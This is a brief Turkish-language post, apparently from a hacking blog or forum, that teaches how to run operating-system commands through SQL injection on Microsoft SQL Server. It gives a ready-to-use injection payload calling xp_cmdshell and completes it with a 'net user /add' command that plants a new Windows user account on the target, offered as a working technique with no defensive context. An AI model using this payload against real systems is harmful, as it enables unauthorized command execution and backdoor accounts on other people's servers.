MsSQL Injection ~ CmdShell Çalıştırma

MsSQL Injection yaparken uzaktan cmdshell çalıştırabiliyoruz.Şu komut ile cmdshelli çalıştırabilmekteyiz. ;exec master..xp_cmdshell ’’-- ’’ bıraktıgım yer size kalan komutların kullanacagınız yer. mesela en basitinden ’’ şu kısımın arasına bizim o meşhur MS SQL password ve user oluşturma komutumuzu kullanabiliriz. ’net user /add Thelinux Thelinux7’ Tamamlayacak olursak ;exec master..xp_cmdshell ’net user / add Thelinux Thelinux7’--

Tepkiler: